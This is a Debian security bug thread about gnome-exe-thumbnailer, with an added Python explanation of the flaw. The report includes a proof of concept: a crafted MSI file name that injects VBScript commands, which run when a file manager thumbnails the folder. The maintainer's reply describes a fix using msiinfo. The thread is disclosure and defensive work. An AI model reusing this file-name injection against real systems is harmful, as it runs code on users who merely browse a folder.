Control: tag 868705 + pending fixed-upstream

Hi,

msiinfo is part of msitools, just like wixl: https://github.com/GNOME/msitools. I haven't audited the code, but being under the GNOME umbrella and having a history of 5 years probably means that it's reliable enough. (I've also heard reports so far that msiinfo is a lot /faster/ than running code through Wine's cscript, which is not really much of a surprise.)

Best,
James

On 18/07/17 09:02 AM, Nils Dagsson Moskopp wrote:
> I like that the patch is less code. Deleted code is debugged code!
> Btw, are you sure that using msiinfo does not introduce new bugs?
>
> Cheers,
> Nils
>
> James Lu <bitfl...@gmail.com> writes:
>
>> [ Unknown signature status ]
>> Hi Nils,
>>
>> I wasn't able to reproduce the exploit on my (64-bit) system with either
>> Caja or Nautilus (it also required setting up a new wineprefix in
>> ~/.wine). The msi thumbnail ended up generating without any version
>> information tag at all.
>>
>> Regardless, I've gone and replaced the VBScript-based parsing entirely
>> with msitools' msiinfo in
>> https://github.com/gnome-exe-thumbnailer/gnome-exe-thumbnailer/commit/1d8e3102dd8fd23431ae6127d14a236da6b4a4a5;
>> hopefully this should fix the issue. I'll tag a new release soon and
>> look at pushing the fix to Debian.
>>
>> (Also CC'ing the other maintainers, who I don't think are on the Debian
>> Wine list)
>>
>> Best,
>> James
>>
>> On 18/07/17 05:01 AM, Nils Dagsson Moskopp wrote:
>>> Package: gnome-exe-thumbnailer
>>> Version: 0.9.4-2
>>> Severity: grave
>>> Tags: security
>>> Justification: user security hole
>>>
>>> Dear Maintainer,
>>>
>>> the following PoC is copied verbatim from my post about the parsing issue:
>>> http://news.dieweltistgarnichtso.net/posts/gnome-thumbnailer-msi-fail.html
>>>
>>> Proof of Concept
>>>
>>> Install Dependencies
>>>
>>> On Debian GNU/Linux, install the packages gnome-exe-thumbnailer, nautilus
>>> and wixl. The wixl package is only needed to create MSI files that trigger
>>> the thumbnailer.
>>>
>>> If the proof of concept does not work, install winetricks and run
>>> winetricks wsh56 to upgrade the Windows Script Host.
>>>
>>> Create MSI Files
>>>
>>> Create a file named poc.xml with the following content:
>>>
>>> <?xml version="1.0" encoding="utf-8"?>
>>> <Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
>>> <Product Version="1.0"/>
>>> </Wix>
>>>
>>> Execute the following Bourne Shell code:
>>>
>>> wixl -o poc.msi poc.xml
>>> cp poc.msi "poc.msi\",0):Set
>>> fso=CreateObject(\"Scripting.FileSystemObject\"):Set
>>> poc=fso.CreateTextFile(\"badtaste.txt\")'.msi"
>>>
>>> Trigger Execution
>>>
>>> Start GNOME Files and navigate to the folder with the MSI files. An empty
>>> file with the name badtaste.txt should appear.
>>>
>>> *** End of the template - remove these template lines ***
>>>
>>>
>>> -- System Information:
>>> Debian Release: 9.0
>>> APT prefers stable
>>> APT policy: (500, 'stable')
>>> Architecture: i386 (i686)
>>>
>>> Kernel: Linux 3.16.0-4-686-pae (SMP w/1 CPU core)
>>> Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
>>> Shell: /bin/sh linked to /bin/dash
>>> Init: sysvinit (via /sbin/init)
>>>
>>> Versions of packages gnome-exe-thumbnailer depends on:
>>> ii icoutils 0.31.2-1.1
>>> ii imagemagick 8:6.9.7.4+dfsg-11
>>> ii imagemagick-6.q16 [imagemagick] 8:6.9.7.4+dfsg-11
>>> ii libglib2.0-bin 2.50.3-2
>>>
>>> Versions of packages gnome-exe-thumbnailer recommends:
>>> pn wine
>>> <none>
>>> pn wine64-tools | wine32-tools | wine64-development-tools | wine32-dev
>>> <none>
>>>
>>> gnome-exe-thumbnailer suggests no packages.
>>>
>>> -- no debconf information
>>>
>>> _______________________________________________
>>> pkg-wine-party mailing list
>>> pkg-wine-pa...@lists.alioth.debian.org
>>> http://lists.alioth.debian.org/cgi-bin/mailman/listinfo/pkg-wine-party
>>>
>>
>
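An added illustration of the bug class this thread is about, not code from gnome-exe-thumbnailer or msitools: it shows why a file name pasted into generated script text can change the script, and why handing the name to a tool as a single argument cannot. The VBScript template is a hypothetical stand-in (the thread does not show the old script), and the `msiinfo export <file> Property` call is an assumption about how the tool would be invoked.

```python
import os

# Hypothetical template: the thread does not show the old VBScript, only
# that the file name ended up inside a script handed to Wine's cscript.
TEMPLATE = 'Set db = installer.OpenDatabase({arg}, 0)'

# File name from the bug report's proof of concept.
POC_NAME = ('poc.msi",0):Set fso=CreateObject("Scripting.FileSystemObject")'
            ':Set poc=fso.CreateTextFile("badtaste.txt")\'.msi')

def render_naive(path):
    """Vulnerable pattern: paste the name between two quote characters."""
    return TEMPLATE.format(arg='"' + path + '"')

def render_quoted(path):
    """VBScript escapes a quote inside a string literal by doubling it."""
    return TEMPLATE.format(arg='"' + path.replace('"', '""') + '"')

def skeleton(line):
    """Return the line with string contents and trailing comment removed."""
    out, i, in_str = [], 0, False
    while i < len(line):
        c = line[i]
        if in_str:
            if c == '"' and line[i + 1:i + 2] == '"':
                i += 2            # doubled quote stays inside the literal
                continue
            if c == '"':
                in_str = False
                out.append(c)
        elif c == '"':
            in_str = True
            out.append(c)
        elif c == "'":
            break                 # rest of the line is a comment
        else:
            out.append(c)
        i += 1
    return "".join(out)

def changes_code(rendered):
    """True if the file name altered the statement instead of only its data."""
    return skeleton(rendered) != skeleton(render_naive("setup.msi"))

def msiinfo_argv(path):
    """No script text at all: the name travels as one argv element.
    abspath() keeps a leading '-' from being read as an option."""
    return ["msiinfo", "export", os.path.abspath(path), "Property"]
```

The list from `msiinfo_argv()` is meant for `subprocess.run(argv)` without `shell=True`, so no interpreter ever parses the file name.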